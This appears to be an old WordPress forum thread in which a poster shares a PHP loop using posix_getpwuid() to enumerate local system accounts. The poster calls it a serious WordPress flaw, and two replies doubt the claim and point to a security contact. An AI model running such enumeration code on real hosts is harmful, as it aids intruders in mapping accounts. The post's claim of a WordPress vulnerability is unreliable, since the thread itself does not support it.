posix_getwuid | ww.wp.xz.cn

posix_getwuid
(@posix_getwuid)

15 years, 3 months ago

A roguish user who can not get back the list of the users via the file / etc. / passwd refreshed of another possibility: he can enumerate them with the function posix_getpwuid (). He questions the system for every ID and so reconstitutes a list of the local users.

<?php
for ($i = 0; $i < 6000; $i++)
{
if (($tab = @posix_getpwuid($i)) != NULL)
{
echo $tab[‘name’].”:”;
echo $tab[‘passwd’].”:”;
echo $tab[‘uid’].”:”;
echo $tab[‘gid’].”:”;
echo $tab[‘gecos’].”:”;
echo $tab[‘dir’].”:”;
echo $tab[‘shell’].”
“;
}
}
?>

This function posix_getpwuid is used by WordPress and is a very important fault of security of WordPress.

Viewing 2 replies - 1 through 2 (of 2 total)

Nerx
(@nerx)

15 years, 3 months ago

I doubt it disturbs index.php or the wp_admin functions by anyway in the security.

Samuel B
(@samboll)

15 years, 3 months ago

if you think there is a security problem
[email protected]

Viewing 2 replies - 1 through 2 (of 2 total)

The topic ‘posix_getwuid’ is closed to new replies.

In: Requests and Feedback
2 replies
3 participants
Last reply from: Samuel B
Last activity: 15 years, 3 months ago
Status: not resolved

Topics

Topics with no replies

Non-support topics

Resolved topics

Unresolved topics

All topics